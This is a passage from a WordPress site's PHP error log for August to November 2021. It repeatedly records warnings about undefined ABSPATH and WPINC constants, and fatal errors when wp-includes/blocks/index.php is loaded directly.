'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Aug-2021 08:06:19 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Aug-2021 08:06:19 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Aug-2021 08:06:19 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Aug-2021 08:06:19 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Aug-2021 09:07:54 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Aug-2021 09:07:54 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Aug-2021 09:07:54 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Aug-2021 09:07:54 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Aug-2021 18:34:15 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Aug-2021 18:34:15 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Aug-2021 18:34:15 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Aug-2021 18:34:15 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Aug-2021 18:54:35 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Aug-2021 18:54:35 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Aug-2021 18:54:35 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Aug-2021 18:54:35 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [09-Aug-2021 13:00:25 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [09-Aug-2021 13:00:25 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [09-Aug-2021 13:00:25 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [09-Aug-2021 13:00:25 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [09-Aug-2021 18:39:31 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [09-Aug-2021 18:39:31 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [09-Aug-2021 18:39:31 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [09-Aug-2021 18:39:31 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [11-Aug-2021 11:19:30 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [11-Aug-2021 11:19:30 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [11-Aug-2021 11:19:30 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [11-Aug-2021 11:19:30 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Aug-2021 05:23:21 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Aug-2021 05:23:21 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Aug-2021 05:23:21 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Aug-2021 05:23:21 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Aug-2021 22:29:28 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Aug-2021 22:29:28 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Aug-2021 22:29:28 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Aug-2021 22:29:28 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [18-Aug-2021 04:43:36 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [18-Aug-2021 04:43:36 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [18-Aug-2021 04:43:36 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [18-Aug-2021 04:43:36 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [22-Aug-2021 16:36:36 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [22-Aug-2021 16:36:36 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [22-Aug-2021 16:36:36 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [22-Aug-2021 16:36:36 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Aug-2021 14:49:54 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Aug-2021 14:49:54 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Aug-2021 14:49:54 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Aug-2021 14:49:54 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [27-Aug-2021 10:18:03 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [27-Aug-2021 10:18:03 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [27-Aug-2021 10:18:03 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [27-Aug-2021 10:18:03 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [30-Aug-2021 06:54:28 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [30-Aug-2021 06:54:28 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [30-Aug-2021 06:54:28 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [30-Aug-2021 06:54:28 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Sep-2021 23:00:19 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Sep-2021 23:00:19 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Sep-2021 23:00:19 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Sep-2021 23:00:19 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [05-Sep-2021 00:21:30 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [05-Sep-2021 00:21:30 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [05-Sep-2021 00:21:30 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [05-Sep-2021 00:21:30 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [12-Sep-2021 00:18:17 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [12-Sep-2021 00:18:17 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [12-Sep-2021 00:18:17 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [12-Sep-2021 00:18:17 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [23-Sep-2021 10:25:08 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [23-Sep-2021 10:25:08 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [23-Sep-2021 10:25:08 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [23-Sep-2021 10:25:08 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [29-Sep-2021 11:53:18 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [29-Sep-2021 11:53:18 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [29-Sep-2021 11:53:18 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [29-Sep-2021 11:53:18 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Oct-2021 00:48:06 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Oct-2021 00:48:06 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Oct-2021 00:48:06 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Oct-2021 00:48:06 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Oct-2021 13:44:44 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Oct-2021 13:44:45 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Oct-2021 13:44:45 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Oct-2021 13:44:45 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Oct-2021 01:28:38 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Oct-2021 01:28:38 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Oct-2021 01:28:38 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Oct-2021 01:28:38 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Oct-2021 14:34:47 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Oct-2021 14:34:47 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Oct-2021 14:34:47 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Oct-2021 14:34:47 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Oct-2021 15:47:50 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Oct-2021 15:47:50 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Oct-2021 15:47:50 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Oct-2021 15:47:50 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [21-Oct-2021 01:01:45 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [21-Oct-2021 01:01:45 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [21-Oct-2021 01:01:45 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [21-Oct-2021 01:01:45 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [03-Nov-2021 10:33:01 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [03-Nov-2021 10:33:01 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [03-Nov-2021 10:33:01 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [03-Nov-2021 10:33:01 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Nov-2021 12:10:13 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Nov-2021 12:10:13 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Nov-2021 12:10:13 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Nov-2021 12:10:13 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Nov-2021 18:15:12 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Nov-2021 18:15:12 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Nov-2021 18:15:12 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Nov-2021 18:15:12 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [09-Nov-2021 18:26:24 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [09-Nov-2021 18:26:24 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [09-Nov-2021 18:26:24 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [09-Nov-2021 18:26:24 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Nov-2021 20:52:04 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Nov-2021 20:52:04 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Nov-2021 20:52:04 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Nov-2021 20:52:04 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [15-Nov-2021 06:55:36 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [15-Nov-2021 06:55:36 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [15-Nov-2021 06:55:36 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [15-Nov-2021 06:55:36 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [19-Nov-2021 21:35:46 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [19-Nov-2021 21:35:46 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [19-Nov-2021 21:35:46 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [19-Nov-2021 21:35:46 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Nov-2021 21:39:01 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Nov-2021 21:39:01 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Nov-2021 21:39:01 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in 